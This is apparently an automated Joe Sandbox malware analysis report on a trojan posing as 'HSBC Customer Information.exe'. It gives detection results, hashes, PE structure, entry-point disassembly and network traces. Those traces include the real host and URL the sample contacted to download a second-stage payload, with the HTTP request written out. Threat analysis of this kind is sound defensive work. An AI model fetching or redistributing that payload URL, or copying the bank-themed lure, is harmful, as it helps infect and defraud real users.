Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery214	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HSBC Customer Information.exe	25%	Virustotal		Browse
HSBC Customer Information.exe	20%	ReversingLabs	Win32.Trojan.Mucc
HSBC Customer Information.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://qrextechnologies.com/barrr09_HVPbNJre68.bin	0%	Avira URL Cloud	safe
https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://cthUYD.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
qrextechnologies.com	109.71.254.175	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://qrextechnologies.com/barrr09_HVPbNJre68.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.org%GETMozilla/5.0	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	URL Reputation: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0	RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://cthUYD.com	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.71.254.175	qrextechnologies.com	Germany		207778	LINSERVERSNL	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483511
Start date:	15.09.2021
Start time:	07:10:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 13s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	HSBC Customer Information.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/0@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.6% (good quality ratio 30.8%) Quality average: 31.7% Quality standard deviation: 33.8%
HCA Information:	Successful, ratio: 88% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.82.210.154, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.82.209.183, 20.54.110.249 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:14:51	API Interceptor	149x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	4478884ce2cf578bf0a0d2484fc8221e5ff63d7cbc73d5200bacbd6e2796e017.exe	Get hash	malicious	Browse	109.71.254.175
	aZq3gco8Ab.exe	Get hash	malicious	Browse	109.71.254.175
	Medical-Engagement-Scale-Questionnaire.msi	Get hash	malicious	Browse	109.71.254.175
	setup_x86_x64_install.exe	Get hash	malicious	Browse	109.71.254.175
	CI and PL of CMZBD-210090.exe	Get hash	malicious	Browse	109.71.254.175
	Aplieco_6635.exe	Get hash	malicious	Browse	109.71.254.175
	egQIhpn3UW.exe	Get hash	malicious	Browse	109.71.254.175
	4J1sKiGm0T.exe	Get hash	malicious	Browse	109.71.254.175
	91a9d1482cacbe1adc5b23f56604b376860c13b69894164a9f79f9292d7f79b1.xls	Get hash	malicious	Browse	109.71.254.175
	#Ud83c#Udfb5mlavarnway_1250PM_ _3pm.html	Get hash	malicious	Browse	109.71.254.175
	lB2RFTpyni.exe	Get hash	malicious	Browse	109.71.254.175
	lgT2LzjZ6N.exe	Get hash	malicious	Browse	109.71.254.175
	ULTkbegFv8.exe	Get hash	malicious	Browse	109.71.254.175
	gmeqUPOV23.exe	Get hash	malicious	Browse	109.71.254.175
	tRMzIpPm2C.exe	Get hash	malicious	Browse	109.71.254.175
	H1zkKCLztq.exe	Get hash	malicious	Browse	109.71.254.175
	BqgOuMRaJ3.exe	Get hash	malicious	Browse	109.71.254.175
	image.exe	Get hash	malicious	Browse	109.71.254.175
	Pm2ZO9KH1V.exe	Get hash	malicious	Browse	109.71.254.175
	m1Bf7Ir6IB.exe	Get hash	malicious	Browse	109.71.254.175

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.225522855611587
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HSBC Customer Information.exe
File size:	122880
MD5:	448f83467c61e465162daf7cf8d9e88f
SHA1:	c627061336905606c2c26b2b460ac4246fd54ca5
SHA256:	4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
SHA512:	1f72e8cc6ec0c5d8f82a47ccd0e8dfa91bb9e7e90a00b34a6a466c8823579e58330f4c709ecb6c580814c3875bf618c1cbb7a5c83f70e8be08dbe46ca1a41fe3
SSDEEP:	1536:5EBupM4lApP843c9C72xMDqXq39T8g9AhfIRorEjc145:g4+p04s9iGMDfl0PrEw145
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....=<O.....................@....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4017ac
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4F3C3DB1 [Wed Feb 15 23:20:17 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4d0b2c4c35fea49148bb1439759df35a

Entrypoint Preview

Instruction
push 0040C454h
call 00007FC36CB59335h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ch
pop eax
stc
out dx, al
adc edx, dword ptr [ebx-56h]
dec eax
cdq
xor ah, byte ptr [edi]
js 00007FC36CB593C0h
push ds
inc ecx
mov ch, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ebx], al
add eax, dword ptr [ecx]
add byte ptr [eax], al
add byte ptr [eax+6Ch], dl
jne 00007FC36CB593B5h
imul esi, dword ptr [ecx+ebp*2+63h], 736E6F63h
jne 00007FC36CB59342h
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or al, 32h
dec esp
push es
sub edi, dword ptr [ebp-6BB60022h]
fadd qword ptr [edi-52h]
sbb al, 69h
mov ebp, 85D79967h
pop es
xor ah, byte ptr [edx-74CF43BCh]
cmpsb
bound esp, dword ptr [edi+4F3A8358h]
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmp al, ABh
add byte ptr [eax], al
dec esi
add byte ptr [eax], al
add byte ptr [eax], al
or al, byte ptr [eax]
dec esp
dec ecx
push esi
push ebx
push esp
inc ebp
inc edi
dec esi
inc ebp
push esp
add byte ptr [53000B01h], cl
outsd
insd
insd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19db4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d000	0x16fe	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x14c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x192f0	0x1a000	False	0.427715594952	data	6.65061784926	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1b000	0x119c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1d000	0x16fe	0x2000	False	0.243530273438	data	2.90412945661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x1de40	0x8be	MS Windows icon resource - 1 icon, 32x32, 11 bits/pixel	English	United States
CUSTOM	0x1db42	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel	English	United States
CUSTOM	0x1da04	0x13e	MS Windows icon resource - 1 icon, 16x16, 16 colors	English	United States
RT_ICON	0x1d8d4	0x130	data
RT_ICON	0x1d5ec	0x2e8	data
RT_ICON	0x1d4c4	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1d494	0x30	data
RT_VERSION	0x1d200	0x294	data	Norwegian	Norway

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaInStrB, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0414 0x04b0
InternalName	Blankningscu5
FileVersion	1.00
CompanyName	Asus
Comments	Thunderbird
ProductName	spicevpn.com
ProductVersion	1.00
FileDescription	Hp, Inc.
OriginalFilename	Blankningscu5.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Norwegian	Norway

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 07:14:39.267390013 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.267465115 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.267642975 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.299012899 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.299042940 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.375438929 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.375636101 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.730459929 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.730519056 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.731198072 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.731314898 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.734287977 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.765878916 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.765928984 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.766189098 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.766231060 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.766554117 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.797091007 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.797210932 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.797358036 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.797394037 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.797485113 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.797548056 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828288078 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828392982 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828459024 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828481913 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828526974 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828604937 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828634977 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828648090 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828905106 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829020977 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829040051 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829272032 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829380035 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829399109 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829581976 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829687119 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829704046 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829871893 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829977989 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829988956 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.830723047 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.862091064 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.862462044 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.862756968 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.862868071 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.862936020 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863046885 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863142967 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863255978 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863372087 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863491058 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863603115 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863712072 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863790035 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863898993 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863975048 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864073992 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864178896 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864283085 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864370108 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864464998 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864562035 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864675045 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864739895 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864835024 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895227909 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895344019 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895487070 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895529985 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895560026 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895632029 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895764112 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895894051 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895960093 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896049023 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896142006 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.896150112 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896204948 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896225929 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.896234035 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.896284103 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.897289038 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.899893045 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.900063038 CEST	49791	443	192.168.2.3	109.71.254.175

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 07:11:00.729901075 CEST	50620	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:00.766253948 CEST	53	50620	8.8.8.8	192.168.2.3
Sep 15, 2021 07:11:31.351835966 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:31.400479078 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 15, 2021 07:11:33.780060053 CEST	60152	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:33.825601101 CEST	53	60152	8.8.8.8	192.168.2.3
Sep 15, 2021 07:11:51.843823910 CEST	57544	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:51.885613918 CEST	53	57544	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:09.509416103 CEST	55984	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:09.545875072 CEST	53	55984	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:15.316302061 CEST	64185	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:15.352229118 CEST	53	64185	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:46.375292063 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:46.410969019 CEST	53	65110	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:49.240334988 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:49.284069061 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:54.163676977 CEST	63492	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:54.213160992 CEST	53	63492	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:54.827075958 CEST	60831	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:54.910854101 CEST	53	60831	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:55.345204115 CEST	60100	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:55.373862028 CEST	53	60100	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:55.776545048 CEST	53195	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:55.847096920 CEST	53	53195	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:56.344090939 CEST	50141	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:56.373194933 CEST	53	50141	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:56.835848093 CEST	53023	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:56.872772932 CEST	53	53023	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:57.487806082 CEST	49563	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:57.570281029 CEST	53	49563	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:58.351824999 CEST	51352	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:58.388124943 CEST	53	51352	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:59.291834116 CEST	59349	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:59.319132090 CEST	53	59349	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:59.808149099 CEST	57084	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:59.835134983 CEST	53	57084	8.8.8.8	192.168.2.3
Sep 15, 2021 07:14:39.176923990 CEST	58823	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:14:39.218681097 CEST	53	58823	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 15, 2021 07:14:39.176923990 CEST	192.168.2.3	8.8.8.8	0x844c	Standard query (0)	qrextechnologies.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 15, 2021 07:14:39.218681097 CEST	8.8.8.8	192.168.2.3	0x844c	No error (0)	qrextechnologies.com		109.71.254.175	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

qrextechnologies.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49791	109.71.254.175	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-15 05:14:39 UTC	0	OUT	GET /barrr09_HVPbNJre68.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: qrextechnologies.com Cache-Control: no-cache
2021-09-15 05:14:39 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 15 Sep 2021 05:14:39 GMT Server: Apache Last-Modified: Tue, 14 Sep 2021 21:20:41 GMT Accept-Ranges: bytes Content-Length: 221760 Connection: close Content-Type: application/octet-stream
